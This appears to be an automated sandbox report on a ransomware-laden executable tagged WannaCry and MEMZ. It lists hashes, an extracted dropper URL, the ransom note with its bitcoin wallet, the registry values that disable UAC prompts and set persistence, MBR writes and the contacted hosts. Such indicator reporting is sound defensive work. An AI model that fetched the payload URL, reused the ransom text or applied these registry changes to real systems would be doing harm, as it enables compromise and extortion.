wannacry | 5f04be7f8b2d882931ab4d8ae975c74c9a02f30dbf5b3d728d32d23bb257fd7b

Resubmissions

11-07-2024 18:33

240711-w7glhsyfjn 7

11-07-2024 18:33

240711-w665sa1fme 7

11-07-2024 18:09

240711-wrsnvazhng 10

11-07-2024 14:38

240711-rzygvatajf 10

Analysis

max time kernel
1329s
max time network
1377s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
11-07-2024 18:09

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

hentai_and_nudes.exe
Size

8.4MB
MD5

e3ffdd51eee6c10338d01f5101deaa15
SHA1

3146e8075fe05e6747890b5a70a725d4481801ce
SHA256

5f04be7f8b2d882931ab4d8ae975c74c9a02f30dbf5b3d728d32d23bb257fd7b
SHA512

6d98ec5d4a2574547f4fe871369c5e0e32f463c6342f14b8ece001883ba76610daecd6316b691787a11c7506549b4216d8cb7816035771a3add6d8ee9c06d5ab
SSDEEP

196608:uINGefFRHvUWvogWOxu9kXwvdbD64uLnH0W8/LaSzy8s+5BZN/:BGCFRHd3bAlbiUW83zLZN

Score

10^/10

wannacry bootkit defense_evasion discovery evasion execution impact persistence privilege_escalation pyinstaller ransomware spyware stealer trojan upx worm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://text.is/QW7R/raw

Extracted

Path

C:\Users\Admin\Downloads\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

Modifies WinLogon for persistence 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

MBAMService.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe"	MBAMService.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,"	MBAMService.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

MBSetup.exe

description pid process target process

PID 5184 created 3496 5184 MBSetup.exe Explorer.EXE

description	pid	process	target process
PID 5184 created 3496	5184	MBSetup.exe	Explorer.EXE

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	powershell.exe

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

18 1388 powershell.exe
29 3488 powershell.exe
35 3488 powershell.exe
38 3488 powershell.exe
169 3904 powershell.exe

flow	pid	process
18	1388	powershell.exe
29	3488	powershell.exe
35	3488	powershell.exe
38	3488	powershell.exe
169	3904	powershell.exe

Boot or Logon Autostart Execution: Active Setup 2 TTPs 2 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

Processes:

MSAGENT.EXEtv_enua.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\software\WOW6432Node\microsoft\Active Setup\Installed Components	MSAGENT.EXE
Key created	\REGISTRY\MACHINE\software\WOW6432Node\microsoft\Active Setup\Installed Components	tv_enua.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Powershell Invoke Web Request.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

1388 powershell.exe
6876 powershell.exe
3488 powershell.exe
3904 powershell.exe
Downloads MZ/PE file

Drops file in Drivers directory 9 IoCs

Processes:

MBSetup.exeMBAMService.exeMBAMService.exeMBAMInstallerService.exe

description	ioc	process
File created	C:\Windows\SysWOW64\drivers\mbamtestfile.dat	MBSetup.exe
File created	C:\Windows\system32\DRIVERS\MbamElam.sys	MBAMService.exe
File opened for modification	C:\Windows\system32\DRIVERS\MbamElam.sys	MBAMService.exe
File created	C:\Windows\system32\DRIVERS\mbamswissarmy.sys	MBAMService.exe
File created	C:\Windows\system32\DRIVERS\mwac.sys	MBAMService.exe
File created	C:\Windows\system32\DRIVERS\mbam.sys	MBAMService.exe
File created	C:\Windows\system32\drivers\mbae64.sys	MBAMInstallerService.exe
File created	C:\Windows\system32\DRIVERS\MbamChameleon.sys	MBAMService.exe
File created	C:\Windows\system32\DRIVERS\farflt.sys	MBAMService.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Sets service image path in registry 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

MBAMService.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MBAMSwissArmy\ImagePath = "\\SystemRoot\\System32\\Drivers\\mbamswissarmy.sys"	MBAMService.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mbamchameleon\ImagePath = "\\SystemRoot\\System32\\Drivers\\MbamChameleon.sys"	MBAMService.exe

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mbupdatrV5.exembupdatrV5.exeMBSetup.exeMBAMService.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	mbupdatrV5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	mbupdatrV5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	mbupdatrV5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MBSetup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	MBSetup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MBAMService.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	MBAMService.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	mbupdatrV5.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

MEMZ (1).exeMEMZ.exeMEMZ.exeWScript.exeUpdates.exeMalwarebytes.exeMEMZ (1).exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation	MEMZ (1).exe
Key value queried	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation	MEMZ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation	MEMZ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation	Updates.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation	Malwarebytes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation	MEMZ (1).exe

Drops startup file 3 IoCs

Processes:

Updates.exeWannaCry.EXE

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updates.lnk	Updates.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD516B.tmp	WannaCry.EXE
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD5172.tmp	WannaCry.EXE

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 64 IoCs

Processes:

Updates.exechromedrivers.exechromedrivers.exesspcss.exeTempclipcoin.exeMBSetup.exeMBSetup.exetkdd.exetkdd.exeMBAMInstallerService.exeMBVpnTunnelService.exeMBAMService.exeMBAMService.exeMalwarebytes.exeMalwarebytes.exeMalwarebytes.exeig.exeig.exeig.exeig.exeig.exeig.exeig.exeig.exeig.exeig.exeig.exeig.exeig.exeig.exeig.exeig.exeig.exeig.exeig.exeig.exeig.exeMEMZ (1).exeMEMZ (1).exeMEMZ (1).exeMEMZ (1).exeMEMZ (1).exeMEMZ (1).exeMEMZ (1).exembupdatrV5.exeMBAMWsc.exeMalwarebytes.exeMalwarebytes.exeig.exeig.exeig.exeig.exeig.exeig.exeig.exeig.exeig.exeig.exeig.exeig.exeig.exeig.exeig.exeig.exe

pid	process
1852	Updates.exe
6364	chromedrivers.exe
1616	chromedrivers.exe
2936	sspcss.exe
6552	Tempclipcoin.exe
5184	MBSetup.exe
1516	MBSetup.exe
5660	tkdd.exe
5800	tkdd.exe
1868	MBAMInstallerService.exe
6576	MBVpnTunnelService.exe
3940	MBAMService.exe
988	MBAMService.exe
6244	Malwarebytes.exe
1468	Malwarebytes.exe
3048	Malwarebytes.exe
1652	ig.exe
2724	ig.exe
6232	ig.exe
6060	ig.exe
2972	ig.exe
4512	ig.exe
5572	ig.exe
4676	ig.exe
696	ig.exe
2980	ig.exe
1048	ig.exe
7012	ig.exe
5676	ig.exe
6988	ig.exe
6832	ig.exe
1496	ig.exe
3428	ig.exe
5308	ig.exe
3004	ig.exe
4872	ig.exe
2956	ig.exe
2348	MEMZ (1).exe
1868	MEMZ (1).exe
2504	MEMZ (1).exe
5888	MEMZ (1).exe
3324	MEMZ (1).exe
2960	MEMZ (1).exe
4168	MEMZ (1).exe
2256	mbupdatrV5.exe
6124	MBAMWsc.exe
6236	Malwarebytes.exe
4496	Malwarebytes.exe
5480	ig.exe
5028	ig.exe
1612	ig.exe
4176	ig.exe
5896	ig.exe
5308	ig.exe
6576	ig.exe
3504	ig.exe
916	ig.exe
4212	ig.exe
3428	ig.exe
5852	ig.exe
5328	ig.exe
5636	ig.exe
5804	ig.exe
4384	ig.exe

Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs

defense_evasion

Safe Mode Boot

T1562.009

Processes:

MBAMInstallerService.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\MBAMService	MBAMInstallerService.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\MBAMService\ = "Service"	MBAMInstallerService.exe

Loads dropped DLL 64 IoCs

Processes:

hentai_and_nudes.exechromedrivers.exetkdd.exe

pid	process
4284	hentai_and_nudes.exe
4284	hentai_and_nudes.exe
4284	hentai_and_nudes.exe
4284	hentai_and_nudes.exe
4284	hentai_and_nudes.exe
4284	hentai_and_nudes.exe
4284	hentai_and_nudes.exe
4284	hentai_and_nudes.exe
4284	hentai_and_nudes.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
1616	chromedrivers.exe
5800	tkdd.exe
5800	tkdd.exe
5800	tkdd.exe
5800	tkdd.exe
5800	tkdd.exe
5800	tkdd.exe
5800	tkdd.exe
5800	tkdd.exe
5800	tkdd.exe
5800	tkdd.exe
5800	tkdd.exe
5800	tkdd.exe
5800	tkdd.exe
5800	tkdd.exe
5800	tkdd.exe
5800	tkdd.exe
5800	tkdd.exe
5800	tkdd.exe
5800	tkdd.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

5912 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
5912	icacls.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI38642\python310.dll	upx
behavioral2/memory/4284-949-0x00007FFB6FF60000-0x00007FFB703CA000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI38642\_ctypes.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI38642\libffi-7.dll	upx
behavioral2/memory/4284-954-0x00007FFB83C00000-0x00007FFB83C24000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI38642\_socket.pyd	upx
behavioral2/memory/4284-957-0x00007FFB852E0000-0x00007FFB852EF000-memory.dmp	upx
behavioral2/memory/4284-959-0x00007FFB83EA0000-0x00007FFB83EB9000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI38642\select.pyd	upx
behavioral2/memory/4284-963-0x00007FFB83BF0000-0x00007FFB83BFD000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI38642\_tkinter.pyd	upx
behavioral2/memory/4284-967-0x00007FFB83340000-0x00007FFB83356000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI38642\tk86t.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI38642\tcl86t.dll	upx
behavioral2/memory/4284-971-0x00007FFB6FDC0000-0x00007FFB6FF57000-memory.dmp	upx
behavioral2/memory/4284-970-0x00007FFB6FBE0000-0x00007FFB6FDB6000-memory.dmp	upx
behavioral2/memory/4284-1031-0x00007FFB6FDC0000-0x00007FFB6FF57000-memory.dmp	upx
behavioral2/memory/4284-1030-0x00007FFB6FBE0000-0x00007FFB6FDB6000-memory.dmp	upx
behavioral2/memory/4284-1029-0x00007FFB83340000-0x00007FFB83356000-memory.dmp	upx
behavioral2/memory/4284-1028-0x00007FFB83BF0000-0x00007FFB83BFD000-memory.dmp	upx
behavioral2/memory/4284-1027-0x00007FFB83EA0000-0x00007FFB83EB9000-memory.dmp	upx
behavioral2/memory/4284-1026-0x00007FFB852E0000-0x00007FFB852EF000-memory.dmp	upx
behavioral2/memory/4284-1025-0x00007FFB83C00000-0x00007FFB83C24000-memory.dmp	upx
behavioral2/memory/4284-1024-0x00007FFB6FF60000-0x00007FFB703CA000-memory.dmp	upx
behavioral2/memory/1616-2397-0x00007FFB6D7A0000-0x00007FFB6DC0A000-memory.dmp	upx
behavioral2/memory/1616-2405-0x00007FFB83140000-0x00007FFB8314F000-memory.dmp	upx
behavioral2/memory/1616-2404-0x00007FFB7FB70000-0x00007FFB7FB94000-memory.dmp	upx
behavioral2/memory/1616-2408-0x00007FFB80070000-0x00007FFB8007D000-memory.dmp	upx
behavioral2/memory/1616-2407-0x00007FFB7F7C0000-0x00007FFB7F7D9000-memory.dmp	upx
behavioral2/memory/1616-2411-0x00007FFB6D360000-0x00007FFB6D6D4000-memory.dmp	upx
behavioral2/memory/1616-2410-0x00007FFB6D6E0000-0x00007FFB6D796000-memory.dmp	upx
behavioral2/memory/1616-2409-0x00007FFB7F0D0000-0x00007FFB7F0FE000-memory.dmp	upx
behavioral2/memory/1616-2424-0x00007FFB6D280000-0x00007FFB6D35F000-memory.dmp	upx
behavioral2/memory/1616-2425-0x00007FFB7F3B0000-0x00007FFB7F3C5000-memory.dmp	upx
behavioral2/memory/1616-2437-0x00007FFB7F910000-0x00007FFB7F91D000-memory.dmp	upx
behavioral2/memory/1616-2438-0x00007FFB7F0B0000-0x00007FFB7F0C9000-memory.dmp	upx
behavioral2/memory/1616-2436-0x00007FFB7F080000-0x00007FFB7F0AC000-memory.dmp	upx
behavioral2/memory/1616-2442-0x00007FFB7ED50000-0x00007FFB7ED64000-memory.dmp	upx
behavioral2/memory/1616-2441-0x00007FFB6D0D0000-0x00007FFB6D1E8000-memory.dmp	upx
behavioral2/memory/1616-2443-0x00007FFB7F830000-0x00007FFB7F840000-memory.dmp	upx
behavioral2/memory/1616-2445-0x00007FFB6D7A0000-0x00007FFB6DC0A000-memory.dmp	upx
behavioral2/memory/1616-2449-0x00007FFB6CE10000-0x00007FFB6D0CC000-memory.dmp	upx
behavioral2/memory/1616-2458-0x0000000070200000-0x00000000720F7000-memory.dmp	upx
behavioral2/memory/1616-2473-0x00007FFB7F7C0000-0x00007FFB7F7D9000-memory.dmp	upx
behavioral2/memory/1616-2474-0x00007FFB6D360000-0x00007FFB6D6D4000-memory.dmp	upx
behavioral2/memory/1616-2475-0x00007FFB6D280000-0x00007FFB6D35F000-memory.dmp	upx
behavioral2/memory/1616-2477-0x00007FFB7BAD0000-0x00007FFB7BAE9000-memory.dmp	upx
behavioral2/memory/1616-2480-0x00007FFB6D6E0000-0x00007FFB6D796000-memory.dmp	upx
behavioral2/memory/1616-2479-0x00007FFB7F0D0000-0x00007FFB7F0FE000-memory.dmp	upx
behavioral2/memory/1616-2482-0x00007FFB768A0000-0x00007FFB768C3000-memory.dmp	upx
behavioral2/memory/1616-2481-0x00007FFB768D0000-0x00007FFB768F1000-memory.dmp	upx
behavioral2/memory/1616-2500-0x00007FFB6FC40000-0x00007FFB6FC53000-memory.dmp	upx
behavioral2/memory/1616-2499-0x00007FFB76880000-0x00007FFB7689A000-memory.dmp	upx
behavioral2/memory/1616-2501-0x00007FFB6CC20000-0x00007FFB6CCC6000-memory.dmp	upx
behavioral2/memory/1616-2498-0x00007FFB7ADE0000-0x00007FFB7ADF7000-memory.dmp	upx
behavioral2/memory/1616-2497-0x00007FFB7BAB0000-0x00007FFB7BAC9000-memory.dmp	upx
behavioral2/memory/1616-2496-0x00007FFB6CCD0000-0x00007FFB6CD0E000-memory.dmp	upx
behavioral2/memory/1616-2513-0x00007FFB6CD10000-0x00007FFB6CD41000-memory.dmp	upx
behavioral2/memory/1616-2512-0x00007FFB6CD50000-0x00007FFB6CD7B000-memory.dmp	upx
behavioral2/memory/1616-2511-0x00007FFB6CD80000-0x00007FFB6CE0F000-memory.dmp	upx
behavioral2/memory/1616-2618-0x00007FFB6D7A0000-0x00007FFB6DC0A000-memory.dmp	upx
behavioral2/memory/1616-2634-0x00007FFB6CE10000-0x00007FFB6D0CC000-memory.dmp	upx
behavioral2/memory/1616-2625-0x00007FFB6D360000-0x00007FFB6D6D4000-memory.dmp	upx
behavioral2/memory/1616-2632-0x00007FFB7ED50000-0x00007FFB7ED64000-memory.dmp	upx

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Updates.exetv_enua.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updates = "C:\\Users\\Admin\\AppData\\Local\\Updates.exe"	Updates.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Updates = "C:\\Users\\Admin\\AppData\\Local\\Updates.exe"	Updates.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\tv_enua = "RunDll32 advpack.dll,LaunchINFSection C:\\Windows\\INF\\tv_enua.inf, RemoveCabinet"	tv_enua.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tjyfimyzrbju033 = "\"C:\\Users\\Admin\\Downloads\\tasksche.exe\""	reg.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

MBAMService.exeMBAMInstallerService.exe

description	ioc	process
File opened (read-only)	\??\S:	MBAMService.exe
File opened (read-only)	\??\T:	MBAMService.exe
File opened (read-only)	\??\U:	MBAMService.exe
File opened (read-only)	\??\K:	MBAMInstallerService.exe
File opened (read-only)	\??\O:	MBAMService.exe
File opened (read-only)	\??\G:	MBAMService.exe
File opened (read-only)	\??\V:	MBAMService.exe
File opened (read-only)	\??\W:	MBAMService.exe
File opened (read-only)	\??\X:	MBAMService.exe
File opened (read-only)	\??\Z:	MBAMService.exe
File opened (read-only)	\??\O:	MBAMInstallerService.exe
File opened (read-only)	\??\S:	MBAMInstallerService.exe
File opened (read-only)	\??\A:	MBAMService.exe
File opened (read-only)	\??\Y:	MBAMInstallerService.exe
File opened (read-only)	\??\X:	MBAMInstallerService.exe
File opened (read-only)	\??\N:	MBAMService.exe
File opened (read-only)	\??\B:	MBAMInstallerService.exe
File opened (read-only)	\??\J:	MBAMInstallerService.exe
File opened (read-only)	\??\V:	MBAMInstallerService.exe
File opened (read-only)	\??\B:	MBAMService.exe
File opened (read-only)	\??\Y:	MBAMService.exe
File opened (read-only)	\??\I:	MBAMInstallerService.exe
File opened (read-only)	\??\P:	MBAMInstallerService.exe
File opened (read-only)	\??\J:	MBAMService.exe
File opened (read-only)	\??\I:	MBAMService.exe
File opened (read-only)	\??\L:	MBAMService.exe
File opened (read-only)	\??\M:	MBAMService.exe
File opened (read-only)	\??\Q:	MBAMService.exe
File opened (read-only)	\??\R:	MBAMService.exe
File opened (read-only)	\??\Q:	MBAMInstallerService.exe
File opened (read-only)	\??\E:	MBAMService.exe
File opened (read-only)	\??\E:	MBAMInstallerService.exe
File opened (read-only)	\??\N:	MBAMInstallerService.exe
File opened (read-only)	\??\W:	MBAMInstallerService.exe
File opened (read-only)	\??\Z:	MBAMInstallerService.exe
File opened (read-only)	\??\H:	MBAMService.exe
File opened (read-only)	\??\H:	MBAMInstallerService.exe
File opened (read-only)	\??\L:	MBAMInstallerService.exe
File opened (read-only)	\??\R:	MBAMInstallerService.exe
File opened (read-only)	\??\T:	MBAMInstallerService.exe
File opened (read-only)	\??\U:	MBAMInstallerService.exe
File opened (read-only)	\??\P:	MBAMService.exe
File opened (read-only)	\??\A:	MBAMInstallerService.exe
File opened (read-only)	\??\G:	MBAMInstallerService.exe
File opened (read-only)	\??\M:	MBAMInstallerService.exe
File opened (read-only)	\??\K:	MBAMService.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 17 IoCs

Web Service

T1102

Processes:

flow	ioc
154	discord.com
155	discord.com
169	discord.com
173	discord.com
237	raw.githubusercontent.com
540	pastebin.com
46	pastebin.com
541	pastebin.com
682	camo.githubusercontent.com
683	camo.githubusercontent.com
694	raw.githubusercontent.com
926	raw.githubusercontent.com
927	raw.githubusercontent.com
1144	raw.githubusercontent.com
176	discord.com
238	raw.githubusercontent.com
45	pastebin.com

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

132 ipecho.net
144 ipecho.net
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1542.003

Processes:

MEMZ (1).exeMEMZ.exe

description ioc process

File opened for modification \??\PhysicalDrive0 MEMZ (1).exe
File opened for modification \??\PhysicalDrive0 MEMZ.exe

flow	ioc
132	ipecho.net
144	ipecho.net

description	ioc	process
File opened for modification	\??\PhysicalDrive0	MEMZ (1).exe
File opened for modification	\??\PhysicalDrive0	MEMZ.exe

Drops file in System32 directory 64 IoCs

Processes:

DrvInst.exeMBAMService.exeMBVpnTunnelService.exembupdatrV5.exeMBAMWsc.exetv_enua.exe

description	ioc	process
File opened for modification	C:\Windows\System32\DriverStore\FileRepository\mbtun.inf_amd64_add82795013a7c3b\mbtun.cat	DrvInst.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7447D0CD4A15D8A8E94E184F8B1DF8DF	MBAMService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netl1e64.inf_amd64_8d5ca5ab1472fc44\netl1e64.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netnvm64.inf_amd64_35bbbe80dec15683\netnvm64.PNF	MBVpnTunnelService.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{7e9a13ab-3fe2-ac45-846b-1259fb3ad446}\mbtun.inf	DrvInst.exe
File opened for modification	C:\Windows\System32\DriverStore\Temp\{7e9a13ab-3fe2-ac45-846b-1259fb3ad446}\mbtun.sys	DrvInst.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Malwarebytes\Logs\MBAMSI.alt2.log	mbupdatrV5.exe
File created	C:\Windows\System32\DriverStore\FileRepository\net819xp.inf_amd64_ff7a5dd4f9b1ceba\net819xp.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netvf63a.inf_amd64_a090e6cfaf18cb5c\netvf63a.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netxex64.inf_amd64_ede00b448bfe8099\netxex64.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netwtw08.inf_amd64_7c0c516fb22456cd\netwtw08.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\kdnic.inf_amd64_6649425cdcae9b5f\kdnic.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netr28x.inf_amd64_5d63c7bcbf29107f\netr28x.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\ykinx64.inf_amd64_0bbd8466b526ef26\ykinx64.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\net9500-x64-n650f.inf_amd64_e92c5a65e41993f9\net9500-x64-n650f.PNF	MBVpnTunnelService.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DA3B6E45325D5FFF28CF6BAD6065C907_FBEAFB4EE7383EC8E0A3A2C1EC7FCEAC	MBAMService.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\229169D96B9C20761B929D428962A0A2_FC65190A8D1232A1711F16F9F20C5149	MBAMService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netmyk64.inf_amd64_1f949c30555f4111\netmyk64.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netimm.inf_amd64_8b2087393aaef952\netimm.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\drvstore.tmp	DrvInst.exe
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	DrvInst.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D	MBAMService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netvchannel.inf_amd64_ba3e73aa330c95d6\netvchannel.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\netmlx5.inf_amd64_101a408e6cb1d8f8\netmlx5.PNF	MBVpnTunnelService.exe
File created	C:\Windows\System32\DriverStore\FileRepository\nete1g3e.inf_amd64_af58b4e19562a3f9\nete1g3e.PNF	MBVpnTunnelService.exe
